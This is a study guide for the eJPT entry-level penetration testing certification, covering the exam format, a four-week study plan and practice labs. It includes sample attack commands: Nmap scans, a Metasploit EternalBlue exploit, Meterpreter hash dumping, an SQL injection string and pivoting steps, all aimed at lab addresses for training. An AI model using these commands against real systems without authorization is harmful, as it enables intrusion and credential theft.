The eJPT (eLearnSecurity Junior Penetration Tester) is widely considered the best entry-level penetration testing certification available. Offered by INE Security (formerly eLearnSecurity), it’s a fully hands-on, practical exam with no multiple-choice questions — you compromise real machines in a live network environment and answer questions based on your findings. If you’re just getting into ethical hacking and want a credential that proves real skills, eJPT is the place to start.
Why eJPT?
Before choosing a certification, it’s worth understanding what makes eJPT stand out:
- Fully practical exam — you perform real attacks against a real lab network
- Beginner-friendly — no experience required, but you need foundational networking knowledge
- Affordable — significantly cheaper than OSCP or CEH
- Respected — recognized by employers as proof of hands-on skills, not just memorized theory
- No expiration — once you pass, the cert is permanent (though re-sitting for updated versions is available)
The exam costs $200 USD and gives you 48 hours to complete it. That’s more than enough time for most candidates who have studied properly.
The eJPT exam places you inside a VPN-connected lab environment and asks you to answer 35 questions. These questions are answered by actually compromising hosts in the network, not by theory. Example question types:
- “What is the hostname of the machine at 192.168.X.X?”
- “What is the password for the user found on Machine B?”
- “What flag is located at /root/flag.txt on the target?”
- “How many open ports does the web server have?”
You need a 70% passing score (25 out of 35 questions). Questions have varying point values, so prioritize the higher-point items.
Prerequisites and Study Path
eJPT doesn’t have formal prerequisites, but you should be comfortable with:
- Basic Linux command line
- Networking concepts (IP, TCP/UDP, DNS, HTTP)
- How to use a terminal and basic tools
The INE Starter Pass
INE offers a free Starter Pass that includes the “Penetration Testing Student” (PTS) learning path — the official study course for eJPT. This course alone is sufficient to pass the exam if you work through it thoroughly. Go to ine.com and create a free account.
The PTS course covers:
- Networking fundamentals (TCP/IP, Wireshark, routing)
- Web application basics (HTTP, OWASP Top 10 concepts)
- Information gathering (Nmap, Maltego, passive recon)
- Exploitation (Metasploit Framework, manual exploitation)
- Post-exploitation (privilege escalation basics, pivoting)
Work through all the lab exercises — they’re critical. Watching videos without doing labs leads to exam failure.
Key Skills to Master
Network Scanning with Nmap
You’ll absolutely need Nmap. Know these core scans:
# TCP SYN scan all ports
nmap -sS -p- -T4 192.168.1.0/24
# Service and version detection
nmap -sV -sC 192.168.1.10
# OS detection
nmap -O 192.168.1.10
# Save output
nmap -sV -oN scan_results.txt 192.168.1.10
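The file written by `-oN` can be turned into structured notes instead of being re-read by eye. The following is an added example, not part of the original post: a small parser for nmap's normal output format that groups ports per host and counts only ports in the `open` state. The sample text, hostnames and function names are constructed for illustration.

```python
import re

# Constructed sample in nmap's normal (-oN) layout; not output from a real scan.
SAMPLE = """\
Nmap scan report for 192.168.1.10
Host is up (0.00042s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open     http    Apache httpd 2.4.6
3306/tcp filtered mysql

Nmap scan report for files.lab.local (192.168.1.20)
Host is up (0.00051s latency).
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X
"""

# "Nmap scan report for <ip>" or "... for <hostname> (<ip>)"
HOST_RE = re.compile(r"^Nmap scan report for (?:(\S+) \()?(\d{1,3}(?:\.\d{1,3}){3})\)?$")
# "<port>/<proto> <state> <service> [version...]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_normal(text):
    """Return {ip: {"hostname": str or None, "ports": [dict, ...]}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            current = hosts.setdefault(m.group(2), {"hostname": m.group(1), "ports": []})
        elif (m := PORT_RE.match(line)) and current is not None:
            port, proto, state, service, version = m.groups()
            current["ports"].append({"port": int(port), "proto": proto, "state": state,
                                     "service": service, "version": version.strip()})
    return hosts

def open_ports(hosts, ip):
    """Only 'open' counts; 'filtered' and 'closed' are excluded."""
    return [p["port"] for p in hosts[ip]["ports"] if p["state"] == "open"]

def notes_table(hosts):
    """One tab-separated line per open port, ready to paste into notes."""
    return [f"{ip}\t{h['hostname'] or '-'}\t{p['port']}/{p['proto']}\t{p['service']}\t{p['version']}"
            for ip, h in hosts.items() for p in h["ports"] if p["state"] == "open"]

if __name__ == "__main__":
    print("\n".join(notes_table(parse_nmap_normal(SAMPLE))))
```

To use it on a real scan, pass the contents of `scan_results.txt` to `parse_nmap_normal` in place of `SAMPLE`.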
Metasploit is the backbone of the eJPT exam. You need to know:
# Start Metasploit
msfconsole
# Search for exploits
search eternalblue
# Use a module
use exploit/windows/smb/ms17_010_eternalblue
# Set options
set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
# Run
exploit
After getting a Meterpreter shell:
sysinfo # Get system info
getuid # Current user
shell # Drop to a system shell
search -f *.txt # Find text files
hashdump # Dump password hashes
Web Application Testing
Know how to:
- Use Burp Suite to intercept and modify requests
- Identify and test for SQL injection manually (' OR 1=1--)
- Test for directory traversal
- Read cookies and session tokens
Pivoting and Routing
The eJPT exam often has multiple network segments. You need to pivot through compromised hosts to reach others:
# In Meterpreter
run autoroute -s 10.10.10.0/24
background
# Set up a SOCKS proxy through the pivot
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
# Use proxychains to route traffic
proxychains nmap -sT 10.10.10.20
Study Schedule (4 Weeks)
Week 1: Foundations
- Complete the Networking and Web fundamentals sections of PTS
- Practice Wireshark packet analysis
- Install and configure Kali Linux in VirtualBox
Week 2: Information Gathering
- Master Nmap scanning techniques
- Practice with HackTheBox Starting Point machines
- Learn Metasploit basics
Week 3: Exploitation
- Work through all Metasploit labs in PTS
- Practice exploiting Metasploitable 2 in your local lab
- Learn manual exploitation for common vulnerabilities (SMB, FTP, SSH)
Week 4: Review and Practice
- Redo all INE labs
- Tackle 2–3 TryHackMe learning paths (Jr Penetration Tester path is perfect)
- Read through your notes and practice Nmap + Metasploit from memory
Free Practice Resources
- TryHackMe — “Jr Penetration Tester” path maps almost perfectly to eJPT topics
- HackTheBox Starting Point — free beginner machines
- Metasploitable 2 — deliberately vulnerable Linux VM for local practice
- DVWA — Damn Vulnerable Web Application for web testing practice
Exam Day Tips
- Take notes throughout — document every IP, open port, found credential, and flag
- Start with host discovery — map the entire network before touching anything
- Read each question carefully — some answers require specific output from specific commands
- Don’t get stuck — if one path isn’t working, move to other questions and come back
- Time is generous — 48 hours is plenty; don’t rush
The eJPT is an excellent foundation for OSCP, CEH, or CompTIA Security+. Passing it proves you can operate basic pentesting tools in a real environment — a meaningful differentiator when applying for your first security role.